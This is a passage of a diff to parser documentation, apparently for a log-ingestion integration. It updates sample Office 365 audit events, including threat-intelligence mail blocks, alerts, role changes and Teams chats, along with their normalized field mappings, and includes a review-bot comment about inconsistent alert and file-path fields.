\"MalwareFamily\": \"iPhoneOS/Vortex.C\", \"SHA256\": \"SnltYq0lbVwFlAIf+lQugPXaMcDNV9t9pN/Zkhx7hQ8=\"}, \"LastModifiedBy\": \"people@example.org\", \"LastModifiedDate\": \"2022-01-01T13:00:53\", \"SourceWorkload\": 1}", "event": { "action": "AtpDetection", "code": "47", 
@@ -1875,7 +2038,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2022-07-08T09:10:19\",\"Id\":\"50906475-74dd-4447-ae4d-595d225d0055\",\"Operation\":\"TIMailData\",\"OrganizationId\":\"8a457951-a594-4607-a5dc-dfc72338eb13\",\"RecordType\":28,\"UserKey\":\"ThreatIntel\",\"UserType\":4,\"Version\":1,\"Workload\":\"ThreatIntelligence\",\"ObjectId\":\"4ca2df96-4488-4f3b-a265-b4edaa3c4d8f\",\"UserId\":\"ThreatIntel\",\"AdditionalActionsAndResults\":[\"OriginalDelivery: [N/A]\"],\"AttachmentData\":[{\"FileName\":\"malicious.pdf.exe\",\"FileType\":\"exe;zip\",\"FileVerdict\":1,\"MalwareFamily\":\"Trojan_Gen_FileWithSpoofedExtension_A\",\"SHA256\":\"E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855\"}],\"AuthDetails\":[{\"Name\":\"SPF\",\"Value\":\"Pass\"},{\"Name\":\"DKIM\",\"Value\":\"Fail\"},{\"Name\":\"DMARC\",\"Value\":\"Best guess pass\"},{\"Name\":\"Comp Auth\",\"Value\":\"pass\"}],\"DeliveryAction\":\"Blocked\",\"DetectionMethod\":\"File detonation\",\"DetectionType\":\"Inline\",\"Directionality\":\"Inbound\",\"EventDeepLink\":\"https://protection.office.com/?hash=/threatexplorer?messageParams=a4dbf74a-89e0-40de-b14d-df573f48aa45,a4dbf74a-89e0-40de-b14d-df573f48aa45-0000000000000000000-1,2022-07-08T00:00:00,2022-07-08T23:59:59&view=Malware\",\"InternetMessageId\":\"<4cc4a74e-a195-4222-abd7-a8adf2cd347d@sender.com>\",\"LatestDeliveryLocation\":\"Quarantine\",\"MessageTime\":\"2022-07-08T09:07:47\",\"NetworkMessageId\":\"7250ff78-fd13-45a2-bb5d-23a5d59c2699\",\"OriginalDeliveryLocation\":\"Quarantine\",\"P1Sender\":\"prvs=0000000000=human@sender.com\",\"P2Sender\":\"human@sender.com\",\"Policy\":\"SafeAttachements\",\"PolicyAction\":\"Quarantine\",\"Recipients\":[\"human@example.com\"],\"SenderIp\":\"1.2.3.4\",\"Subject\":\"Refund to you\",\"SystemOverrides\":[{\"Details\":\"Antimalware policy block by file 
type\",\"FinalOverride\":\"No\",\"Result\":\"Block\",\"Source\":\"Tenant\"}],\"ThreatsAndDetectionTech\":[\"Malware: [File detonation]\",\"Spam: [General filter]\"],\"Verdict\":\"Malware\"}\n", + "message": "{\"CreationTime\": \"2022-07-08T09:10:19\", \"Id\": \"50906475-74dd-4447-ae4d-595d225d0055\", \"Operation\": \"TIMailData\", \"OrganizationId\": \"8a457951-a594-4607-a5dc-dfc72338eb13\", \"RecordType\": 28, \"UserKey\": \"ThreatIntel\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"ThreatIntelligence\", \"ObjectId\": \"4ca2df96-4488-4f3b-a265-b4edaa3c4d8f\", \"UserId\": \"ThreatIntel\", \"AdditionalActionsAndResults\": [\"OriginalDelivery: [N/A]\"], \"AttachmentData\": [{\"FileName\": \"malicious.pdf.exe\", \"FileType\": \"exe;zip\", \"FileVerdict\": 1, \"MalwareFamily\": \"Trojan_Gen_FileWithSpoofedExtension_A\", \"SHA256\": \"E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855\"}], \"AuthDetails\": [{\"Name\": \"SPF\", \"Value\": \"Pass\"}, {\"Name\": \"DKIM\", \"Value\": \"Fail\"}, {\"Name\": \"DMARC\", \"Value\": \"Best guess pass\"}, {\"Name\": \"Comp Auth\", \"Value\": \"pass\"}], \"DeliveryAction\": \"Blocked\", \"DetectionMethod\": \"File detonation\", \"DetectionType\": \"Inline\", \"Directionality\": \"Inbound\", \"EventDeepLink\": \"https://protection.office.com/?hash=/threatexplorer?messageParams=a4dbf74a-89e0-40de-b14d-df573f48aa45,a4dbf74a-89e0-40de-b14d-df573f48aa45-0000000000000000000-1,2022-07-08T00:00:00,2022-07-08T23:59:59&view=Malware\", \"InternetMessageId\": \"<4cc4a74e-a195-4222-abd7-a8adf2cd347d@sender.com>\", \"LatestDeliveryLocation\": \"Quarantine\", \"MessageTime\": \"2022-07-08T09:07:47\", \"NetworkMessageId\": \"7250ff78-fd13-45a2-bb5d-23a5d59c2699\", \"OriginalDeliveryLocation\": \"Quarantine\", \"P1Sender\": \"prvs=0000000000=human@sender.com\", \"P2Sender\": \"human@sender.com\", \"Policy\": \"SafeAttachements\", \"PolicyAction\": \"Quarantine\", \"Recipients\": [\"human@example.com\"], \"SenderIp\": \"1.2.3.4\", 
\"Subject\": \"Refund to you\", \"SystemOverrides\": [{\"Details\": \"Antimalware policy block by file type\", \"FinalOverride\": \"No\", \"Result\": \"Block\", \"Source\": \"Tenant\"}], \"ThreatsAndDetectionTech\": [\"Malware: [File detonation]\", \"Spam: [General filter]\"], \"Verdict\": \"Malware\"}", "event": { "action": "Blocked", "code": "28", 
@@ -2021,7 +2184,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2022-07-07T10:10:52\",\"Id\":\"47bf7844-15bf-4cf2-91a3-15b32ceb89b5\",\"Operation\":\"TIUrlClickData\",\"OrganizationId\":\"0eaa2260-b241-410b-bcae-e38c8b68787f\",\"RecordType\":41,\"UserKey\":\"ThreatIntel\",\"UserType\":4,\"Version\":1,\"Workload\":\"ThreatIntelligence\",\"UserId\":\"human@example.org\",\"AppName\":\"Mail\",\"AppVersion\":\"0.0.0000\",\"EventDeepLink\":\"https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=Phish&query-Recipients=people@xample.org&query-NetworkMessageId=53b5da37-1893-4e78-a89f-a4d26b53184c\",\"SourceId\":\"8a8634d0-d803-4bc9-b221-2863bff6a001\",\"TimeOfClick\":\"2022-07-07T09:33:33\",\"Url\":\"https://malicious.domain.com\",\"UserIp\":\"1.2.3.4\"}\n", + "message": "{\"CreationTime\": \"2022-07-07T10:10:52\", \"Id\": \"47bf7844-15bf-4cf2-91a3-15b32ceb89b5\", \"Operation\": \"TIUrlClickData\", \"OrganizationId\": \"0eaa2260-b241-410b-bcae-e38c8b68787f\", \"RecordType\": 41, \"UserKey\": \"ThreatIntel\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"ThreatIntelligence\", \"UserId\": \"human@example.org\", \"AppName\": \"Mail\", \"AppVersion\": \"0.0.0000\", \"EventDeepLink\": \"https://protection.office.com/threatexplorer?dltarget=Explorer&dlstorage=Url&viewid=Phish&query-Recipients=people@xample.org&query-NetworkMessageId=53b5da37-1893-4e78-a89f-a4d26b53184c\", \"SourceId\": \"8a8634d0-d803-4bc9-b221-2863bff6a001\", \"TimeOfClick\": \"2022-07-07T09:33:33\", \"Url\": \"https://malicious.domain.com\", \"UserIp\": \"1.2.3.4\"}", "event": { "action": "TIUrlClickData", "code": "41", 
@@ -2068,7 +2231,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"Id\":\"bb6e6d49\",\"RecordType\":20,\"CreationTime\":\"2023-08-22T13:51:33\",\"Operation\":\"ViewReport\",\"OrganizationId\":\"12b674a1\",\"UserType\":0,\"UserKey\":\"1003200\",\"Workload\":\"PowerBI\",\"UserId\":\"joe.doe@user.fr\",\"ClientIP\":\"1.2.3.4\",\"UserAgent\":\"Mozilla/5.0\",\"Activity\":\"ViewReport\",\"ItemName\":\"Tdb_TI\",\"WorkSpaceName\":\"Tableau de Bord Strat\u00e9gique\",\"DatasetName\":\"Tdb_TI\",\"ReportName\":\"Tdb_TI\",\"CapacityId\":\"5A456BD6\",\"CapacityName\":\"P1_ACOSS\",\"WorkspaceId\":\"08d52dac\",\"AppName\":\"Tableaux de bord de pilotage\",\"ObjectId\":\"Tdb_TI\",\"DatasetId\":\"6f39a3c3\",\"ReportId\":\"213eb6fe\",\"ArtifactId\":\"213eb6fe\",\"ArtifactName\":\"Tdb_TI\",\"IsSuccess\":true,\"ReportType\":\"PowerBIReport\",\"RequestId\":\"94fea00c\",\"ActivityId\":\"147a0db5\",\"AppReportId\":\"fe6a9f80\",\"DistributionMethod\":\"Apps\",\"ConsumptionMethod\":\"Power BI Web\",\"AppId\":\"187ea3f4\",\"ArtifactKind\":\"Report\",\"RefreshEnforcementPolicy\":0}", + "message": "{\"Id\": \"bb6e6d49\", \"RecordType\": 20, \"CreationTime\": \"2023-08-22T13:51:33\", \"Operation\": \"ViewReport\", \"OrganizationId\": \"12b674a1\", \"UserType\": 0, \"UserKey\": \"1003200\", \"Workload\": \"PowerBI\", \"UserId\": \"joe.doe@user.fr\", \"ClientIP\": \"1.2.3.4\", \"UserAgent\": \"Mozilla/5.0\", \"Activity\": \"ViewReport\", \"ItemName\": \"Tdb_TI\", \"WorkSpaceName\": \"Tableau de Bord Strat\\u00e9gique\", \"DatasetName\": \"Tdb_TI\", \"ReportName\": \"Tdb_TI\", \"CapacityId\": \"5A456BD6\", \"CapacityName\": \"P1_ACOSS\", \"WorkspaceId\": \"08d52dac\", \"AppName\": \"Tableaux de bord de pilotage\", \"ObjectId\": \"Tdb_TI\", \"DatasetId\": \"6f39a3c3\", \"ReportId\": \"213eb6fe\", \"ArtifactId\": \"213eb6fe\", \"ArtifactName\": \"Tdb_TI\", \"IsSuccess\": true, \"ReportType\": \"PowerBIReport\", \"RequestId\": 
\"94fea00c\", \"ActivityId\": \"147a0db5\", \"AppReportId\": \"fe6a9f80\", \"DistributionMethod\": \"Apps\", \"ConsumptionMethod\": \"Power BI Web\", \"AppId\": \"187ea3f4\", \"ArtifactKind\": \"Report\", \"RefreshEnforcementPolicy\": 0}", "event": { "action": "ViewReport", "code": "20", 
@@ -2129,6 +2292,89 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "remove_member_from_role.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-07-10T14:31:24\", \"Id\": \"d1253377-388e-4ca1-a163-32dccb867ddd\", \"Operation\": \"Remove member from role.\", \"OrganizationId\": \"a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55\", \"RecordType\": 8, \"ResultStatus\": \"Success\", \"UserKey\": \"key@example.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"AzureActiveDirectory\", \"ObjectId\": \"john.doe@example.com\", \"UserId\": \"admin@example.com\", \"AzureActiveDirectoryEventType\": 1, \"ExtendedProperties\": [{\"Name\": \"additionalDetails\", \"Value\": \"{}\"}, {\"Name\": \"extendedAuditEventCategory\", \"Value\": \"Role\"}], \"ModifiedProperties\": [{\"Name\": \"Role.ObjectID\", \"NewValue\": \"\", \"OldValue\": \"62d603c4-9712-4ea9-83c6-1e253fad40a4\"}, {\"Name\": \"Role.DisplayName\", \"NewValue\": \"\", \"OldValue\": \"Global Administrator\"}, {\"Name\": \"Role.TemplateId\", \"NewValue\": \"\", \"OldValue\": \"2eb5763a-6258-4084-90d6-8f149a03132d\"}, {\"Name\": \"Role.WellKnownObjectName\", \"NewValue\": \"\", \"OldValue\": \"TenantAdmins\"}], \"Actor\": [{\"ID\": \"admin@example.com\", \"Type\": 5}, {\"ID\": \"100320029D963D0D\", \"Type\": 3}, {\"ID\": \"User_47498f0f-242d-4ec8-8c13-9c861ce5669f\", \"Type\": 2}, {\"ID\": \"47498f0f-242d-4ec8-8c13-9c861ce5669f\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}], \"ActorContextId\": \"a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55\", \"InterSystemsId\": \"3da056e9-e6dc-4157-b991-8304c3b95eb7\", \"IntraSystemId\": \"e7bf6e46-a61f-417a-a11d-282756b8262f\", \"SupportTicketId\": \"\", \"Target\": [{\"ID\": \"User_1514c9ec-882d-4beb-99a9-301209f6a05a\", \"Type\": 2}, {\"ID\": \"1514c9ec-882d-4beb-99a9-301209f6a05a\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}, {\"ID\": \"john.doe@example.com\", \"Type\": 5}, {\"ID\": \"100320029D9D1C86\", \"Type\": 3}], 
\"TargetContextId\": \"a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55\"}", + "event": { + "action": "Remove member from role.", + "category": [ + "iam" + ], + "code": "8", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-10T14:31:24Z", + "action": { + "id": 8, + "name": "Remove member from role.", + "outcome": "success", + "target": "user" + }, + "office365": { + "audit": { + "object_id": "john.doe@example.com" + }, + "context": { + "correlation": { + "id": "3da056e9-e6dc-4157-b991-8304c3b95eb7" + }, + "modified_properties": [ + { + "Name": "Role.ObjectID", + "NewValue": "", + "OldValue": "62d603c4-9712-4ea9-83c6-1e253fad40a4" + }, + { + "Name": "Role.DisplayName", + "NewValue": "", + "OldValue": "Global Administrator" + }, + { + "Name": "Role.TemplateId", + "NewValue": "", + "OldValue": "2eb5763a-6258-4084-90d6-8f149a03132d" + }, + { + "Name": "Role.WellKnownObjectName", + "NewValue": "", + "OldValue": "TenantAdmins" + } + ] + }, + "record_type": 8, + "result_status": "Success", + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55" + }, + "related": { + "user": [ + "admin@example.com" + ] + }, + "service": { + "name": "AzureActiveDirectory" + }, + "user": { + "email": "admin@example.com", + "id": "key@example.com", + "name": "admin@example.com" + } + } + + ``` + + === "security_compliance_alert.json" ```json @@ -2158,6 +2404,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "alert": { "category": "ThreatManagement", "display_name": "Phish delivered due to an ETR override", + "id": "77f6d9ce-da8f-46bf-a651-4bec3c189770", "severity": "Informational", "source": "Office 365 Security & Compliance", "status": "Active" 
@@ -2244,6 +2491,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": "DataLossPrevention", "display_name": "description", "entity_type": "DlpRuleMatch", + "id": "cf0708c6-e2c5-4962-ae99-9af4799175f4", "severity": "Low", "source": "Office 365 Security & Compliance", "status": "Active" @@ -2325,6 +2573,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": "MailFlow", "display_name": "Phishing detected", "entity_type": "MalwareFamily", + "id": "178fa649-642f-4d41-943c-451e2266f4a7", "severity": "Low", "source": "Office 365 Security & Compliance", "status": "Active" @@ -2405,6 +2654,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": "ThreatManagement", "display_name": "Email reported by user as junk", "entity_type": "User", + "id": "be2ee3c6-2b3c-42ae-aefe-69f185114418", "severity": "Low", "source": "Office 365 Security & Compliance", "status": "Active" 
@@ -2442,46 +2692,113 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "source_log.json" +=== "security_compliance_alert_5.json" ```json { - "message": "{\"AppAccessContext\":{\"AADSessionId\":\"xxxxxx\",\"CorrelationId\":\"xxxxxx\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2023-12-13T09:43:17\",\"Id\":\"xxxxxx\",\"Operation\":\"AccessRequestCreated\",\"OrganizationId\":\"xxxxxx\",\"RecordType\":14,\"UserKey\":\"i:0h.f|membership|xxxxxx@test.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"SharePoint\",\"ClientIP\":\"0.0.0.0\",\"UserId\":\"user@test.io\",\"AuthenticationType\":\"FormsCookieAuth\",\"BrowserName\":\"Chrome\",\"BrowserVersion\":\"120.0.0.0\",\"CorrelationId\":\"xxxxxx\",\"EventSource\":\"SharePoint\",\"IsManagedDevice\":false,\"ItemType\":\"File\",\"ListId\":\"xxxxx\",\"ListItemUniqueId\":\"xxxxx\",\"Platform\":\"WinDesktop\",\"Site\":\"xxxxxxxxx\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\",\"WebId\":\"xxxxxxxxx\",\"DeviceDisplayName\":\"xxxxxxxxx\",\"EventData\":\"Lecture12/03/2024 09:43:15\",\"SourceFileExtension\":\"xlsx\",\"TargetUserOrGroupType\":\"Member\",\"TargetUserOrGroupName\":\"user@test.io\",\"SiteUrl\":\"https://maindomain.com/subdomain/endvalue\",\"SourceRelativeUrl\":\"Documents partages/xxxxx.xlsx\",\"SourceFileName\":\"xxxxx.xlsx\",\"ObjectId\":\"xxxxx.xlsx\"}", + "message": "{\"CreationTime\": \"2024-04-16T08:01:42\", \"Id\": \"d7cab54f-77b1-4ad5-8f2d-b4bba61e4e93\", \"Operation\": \"AlertEntityGenerated\", \"OrganizationId\": \"e0ff0845-9d15-4399-86ae-15081e39a16a\", \"RecordType\": 40, \"ResultStatus\": \"Succeeded\", \"UserKey\": \"SecurityComplianceAlerts\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"SecurityComplianceCenter\", \"ObjectId\": \"jdoe@example.org\", \"UserId\": \"SecurityComplianceAlerts\", \"AlertEntityId\": \"jdoe@example.org\", \"AlertId\": 
\"a3ce0859-c92c-4f57-b50b-a63dad75ec4a\", \"AlertLinks\": [], \"AlertType\": \"System\", \"Category\": \"ThreatManagement\", \"Comments\": \"New alert\", \"Data\": \"\", \"EntityType\": \"User\", \"Name\": \"Email reported by user as malware or phish\", \"PolicyId\": \"88d533c5-bad6-4cfb-9245-1776726b55d7\", \"Severity\": \"Low\", \"Source\": \"Office 365 Security & Compliance\", \"Status\": \"Investigating\"}", "event": { - "action": "AccessRequestCreated", + "action": "AlertEntityGenerated", "category": [ - "file" + "intrusion_detection" ], - "code": "14", + "code": "40", + "kind": "alert", "outcome": "success", "type": [ "info" ] }, - "@timestamp": "2023-12-13T09:43:17Z", + "@timestamp": "2024-04-16T08:01:42Z", "action": { - "id": 14, - "name": "AccessRequestCreated", + "id": 40, + "name": "AlertEntityGenerated", "outcome": "success", - "properties": [ - { - "SiteUrl": "https://maindomain.com/subdomain/endvalue", - "SourceFileName": "xxxxx.xlsx", - "SourceRelativeUrl": "Documents partages/xxxxx.xlsx", - "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" - } - ], "target": "user" }, - "file": { - "directory": "Documents partages/xxxxx.xlsx", - "extension": "xlsx", - "name": "xxxxx.xlsx" - }, "office365": { + "alert": { + "category": "ThreatManagement", + "display_name": "Email reported by user as malware or phish", + "id": "a3ce0859-c92c-4f57-b50b-a63dad75ec4a", + "severity": "Low", + "source": "Office 365 Security & Compliance", + "status": "Investigating" + }, "audit": { - "object_id": "xxxxx.xlsx" + "object_id": "jdoe@example.org" + }, + "record_type": 40, + "result_status": "Succeeded", + "user_type": { + "code": 4, + "name": "System" + } + }, + "organization": { + "id": "e0ff0845-9d15-4399-86ae-15081e39a16a" + }, + "related": { + "user": [ + "SecurityComplianceAlerts" + ] + }, + "rule": { + "id": "88d533c5-bad6-4cfb-9245-1776726b55d7" + }, + "service": { + "name": 
"SecurityComplianceCenter" + }, + "user": { + "id": "SecurityComplianceAlerts", + "name": "SecurityComplianceAlerts" + } + } + + ``` + + +=== "source_log.json" + + ```json + + { + "message": "{\"AppAccessContext\": {\"AADSessionId\": \"xxxxxx\", \"CorrelationId\": \"xxxxxx\", \"UniqueTokenId\": \"xxxxxx\"}, \"CreationTime\": \"2023-12-13T09:43:17\", \"Id\": \"xxxxxx\", \"Operation\": \"AccessRequestCreated\", \"OrganizationId\": \"xxxxxx\", \"RecordType\": 14, \"UserKey\": \"i:0h.f|membership|xxxxxx@test.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"SharePoint\", \"ClientIP\": \"0.0.0.0\", \"UserId\": \"user@test.io\", \"AuthenticationType\": \"FormsCookieAuth\", \"BrowserName\": \"Chrome\", \"BrowserVersion\": \"120.0.0.0\", \"CorrelationId\": \"xxxxxx\", \"EventSource\": \"SharePoint\", \"IsManagedDevice\": false, \"ItemType\": \"File\", \"ListId\": \"xxxxx\", \"ListItemUniqueId\": \"xxxxx\", \"Platform\": \"WinDesktop\", \"Site\": \"xxxxxxxxx\", \"UserAgent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\", \"WebId\": \"xxxxxxxxx\", \"DeviceDisplayName\": \"xxxxxxxxx\", \"EventData\": \"Lecture12/03/2024 09:43:15\", \"SourceFileExtension\": \"xlsx\", \"TargetUserOrGroupType\": \"Member\", \"TargetUserOrGroupName\": \"user@test.io\", \"SiteUrl\": \"https://maindomain.com/subdomain/endvalue\", \"SourceRelativeUrl\": \"Documents partages/xxxxx.xlsx\", \"SourceFileName\": \"xxxxx.xlsx\", \"ObjectId\": \"xxxxx.xlsx\"}", + "event": { + "action": "AccessRequestCreated", + "category": [ + "file" + ], + "code": "14", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2023-12-13T09:43:17Z", + "action": { + "id": 14, + "name": "AccessRequestCreated", + "outcome": "success", + "properties": [ + { + "SiteUrl": "https://maindomain.com/subdomain/endvalue", + "SourceFileName": "xxxxx.xlsx", + "SourceRelativeUrl": "Documents partages/xxxxx.xlsx", + "UserAgent": "Mozilla/5.0 
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" + } + ], + "target": "user" + }, + "file": { + "directory": "Documents partages/xxxxx.xlsx", + "extension": "xlsx", + "name": "xxxxx.xlsx" + }, + "office365": { + "audit": { + "object_id": "xxxxx.xlsx" }, "context": { "aad_session_id": "xxxxxx", 
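Review bot: the new `security_compliance_alert_5.json` sample omits `office365.alert.entity_type` although the raw event carries `\"EntityType\": \"User\"` and the neighbouring Security & Compliance samples (`@@ -2244`, `@@ -2325`, `@@ -2405`) do populate `entity_type`; the alert subject (`AlertEntityId` / `ObjectId` = `jdoe@example.org`) likewise survives only as `office365.audit.object_id`, unlike the `AlertUpdated` sample where the subject is promoted to `user.*`. Either the parser drops `EntityType` for `AlertEntityGenerated` or this output is stale; regenerate it or fix the mapping so the alert samples are consistent. Separately, in the re-added `source_log.json` the fixture's `SourceRelativeUrl` is `Documents partages/xxxxx.xlsx`, so the documented `file.directory` ends in the file name, while the `FileSyncDownloadedFull` sample shows the field is normally the folder only (`public/assets/website`); this anonymised fixture misrepresents the mapping and should carry a folder path.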
@@ -2545,7 +2862,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2022-04-05T19:51:35\",\"Id\":\"1324e3d2-f29c-5c15-9f44-1ca64e42250f\",\"Operation\":\"MessageCreatedHasLink\",\"OrganizationId\":\"34314e6e-4023-4e4b-a15e-143f63244e2b\",\"RecordType\":25,\"UserKey\":\"11dbae04-5d5d-4bc7-9766-16793ed91233\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\",\"ClientIP\":\"::ffff:1.2.3.4\",\"UserId\":\"email@example.org\",\"ChatThreadId\":\"19:11dbae04-5d5d-4bc7-9766-16793ed91233_4fdb1e07-a7e9-475c-a5e2-8d042a6c8102@unq.gbl.spaces\",\"CommunicationType\":\"OneOnOne\",\"ExtraProperties\":[{\"Key\":\"TimeZone\",\"Value\":\"Europe/Paris\"},{\"Key\":\"OsName\",\"Value\":\"windows\"},{\"Key\":\"OsVersion\",\"Value\":\"10\"},{\"Key\":\"Country\",\"Value\":\"fr\"},{\"Key\":\"ClientName\",\"Value\":\"skypeteams\"},{\"Key\":\"ClientVersion\",\"Value\":\"27/1.0.0.2022031814\"},{\"Key\":\"ClientUtcOffsetSeconds\",\"Value\":\"7200\"}],\"MessageId\":\"1649188295480\",\"MessageVersion\":\"1649188295480\",\"ItemName\":\"19:11dbae04-5d5d-4bc7-9766-16793ed91233_4fdb1e07-a7e9-475c-a5e2-8d042a6c8102@unq.gbl.spaces\",\"MessageURLs\":[\"https://www.amazon.fr/s?i=merchant-items&me=A1TLEYKQIC7812&marketplaceID=A13V1IB3VIYZZH&qid=1649187214&ref=sr_pg_1\"],\"Members\": [{\"UPN\": \"admin@example.org\", \"Role\": 1}, {\"UPN\": \"user1@example.org\", \"Role\": 0}]}", + "message": "{\"CreationTime\": \"2022-04-05T19:51:35\", \"Id\": \"1324e3d2-f29c-5c15-9f44-1ca64e42250f\", \"Operation\": \"MessageCreatedHasLink\", \"OrganizationId\": \"34314e6e-4023-4e4b-a15e-143f63244e2b\", \"RecordType\": 25, \"UserKey\": \"11dbae04-5d5d-4bc7-9766-16793ed91233\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\", \"ClientIP\": \"::ffff:1.2.3.4\", \"UserId\": \"email@example.org\", \"ChatThreadId\": \"19:11dbae04-5d5d-4bc7-9766-16793ed91233_4fdb1e07-a7e9-475c-a5e2-8d042a6c8102@unq.gbl.spaces\", 
\"CommunicationType\": \"OneOnOne\", \"ExtraProperties\": [{\"Key\": \"TimeZone\", \"Value\": \"Europe/Paris\"}, {\"Key\": \"OsName\", \"Value\": \"windows\"}, {\"Key\": \"OsVersion\", \"Value\": \"10\"}, {\"Key\": \"Country\", \"Value\": \"fr\"}, {\"Key\": \"ClientName\", \"Value\": \"skypeteams\"}, {\"Key\": \"ClientVersion\", \"Value\": \"27/1.0.0.2022031814\"}, {\"Key\": \"ClientUtcOffsetSeconds\", \"Value\": \"7200\"}], \"MessageId\": \"1649188295480\", \"MessageVersion\": \"1649188295480\", \"ItemName\": \"19:11dbae04-5d5d-4bc7-9766-16793ed91233_4fdb1e07-a7e9-475c-a5e2-8d042a6c8102@unq.gbl.spaces\", \"MessageURLs\": [\"https://www.amazon.fr/s?i=merchant-items&me=A1TLEYKQIC7812&marketplaceID=A13V1IB3VIYZZH&qid=1649187214&ref=sr_pg_1\"], \"Members\": [{\"UPN\": \"admin@example.org\", \"Role\": 1}, {\"UPN\": \"user1@example.org\", \"Role\": 0}]}", "event": { "action": "MessageCreatedHasLink", "category": [ 
@@ -2623,6 +2940,313 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "teams_with_foreign_tenant_users.json" + + ```json + + { + "message": "{\"AppAccessContext\": {\"IssuedAtTime\": \"2024-06-10T06:51:28\", \"UniqueTokenId\": \"mYyWp_-UrEa4Z_pZM7FlAA\"}, \"CreationTime\": \"2024-06-10T11:50:24\", \"Id\": \"4e3612b5-9cf5-4c6d-8213-2ba12af15334\", \"Operation\": \"ChatCreated\", \"OrganizationId\": \"a84a7a26-d1f0-4d45-a875-481355e2d96c\", \"RecordType\": 25, \"UserKey\": \"c5a134b1-6eb3-4558-95e5-7f3f04219cf2\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\", \"ClientIP\": \"dc73:8fb1:6e9:c37a:334b:8bb7:313a:766b\", \"UserId\": \"c5a134b1-6eb3-4558-95e5-7f3f04219cf2\", \"ChatThreadId\": \"19:2546ebff-72fd-4fda-b537-bc31bf5e1d4c_ba359007-06c1-497f-bc4a-41ea45df4cbd@unq.gbl.spaces\", \"CommunicationType\": \"OneOnOne\", \"ExtraProperties\": [{\"Key\": \"TimeZone\", \"Value\": \"Europe/Paris\"}, {\"Key\": \"OsName\", \"Value\": \"windows\"}, {\"Key\": \"OsVersion\", \"Value\": \"10\"}, {\"Key\": \"Country\", \"Value\": \"fr\"}, {\"Key\": \"ClientName\", \"Value\": \"skypeteams\"}, {\"Key\": \"ClientVersion\", \"Value\": \"27/1.0.0.2024052206\"}, {\"Key\": \"ClientUtcOffsetSeconds\", \"Value\": \"7200\"}], \"Members\": [{\"OrganizationId\": \"6d869a66-371f-4b76-a1f6-3c115469a99d\", \"DisplayName\": \"John Doe\", \"UPN\": \"john.doe@example.org\"}, {\"OrganizationId\": \"6db03b45-27a2-4662-9121-fa5773a8e043\", \"DisplayName\": \"Jane Doe\", \"UPN\": \"jane.doe@example.com\"}], \"ParticipantInfo\": {\"HasForeignTenantUsers\": true, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [\"example.org\", \"example.com\"], \"ParticipatingSIPDomains\": [{\"DomainName\": \"example.org\", \"TenantId\": \"6d869a66-371f-4b76-a1f6-3c115469a99d\"}, {\"DomainName\": \"example.com\", \"TenantId\": \"6db03b45-27a2-4662-9121-fa5773a8e043\"}], 
\"ParticipatingTenantIds\": [\"6d869a66-371f-4b76-a1f6-3c115469a99d\", \"6db03b45-27a2-4662-9121-fa5773a8e043\"]}, \"ResourceTenantId\": \"6db03b45-27a2-4662-9121-fa5773a8e043\", \"ItemName\": \"19:2546ebff-72fd-4fda-b537-bc31bf5e1d4c_ba359007-06c1-497f-bc4a-41ea45df4cbd@unq.gbl.spaces\"}", + "event": { + "action": "ChatCreated", + "category": [ + "network" + ], + "code": "25", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-10T11:50:24Z", + "action": { + "id": 25, + "name": "ChatCreated", + "outcome": "success", + "target": "network-traffic" + }, + "office365": { + "record_type": 25, + "teams": { + "communication": { + "type": "OneOnOne" + }, + "has_foreign_tenant_users": true, + "team": { + "members": [ + { + "id": "john.doe@example.org", + "name": "John Doe" + }, + { + "id": "jane.doe@example.com", + "name": "Jane Doe" + } + ] + } + }, + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": 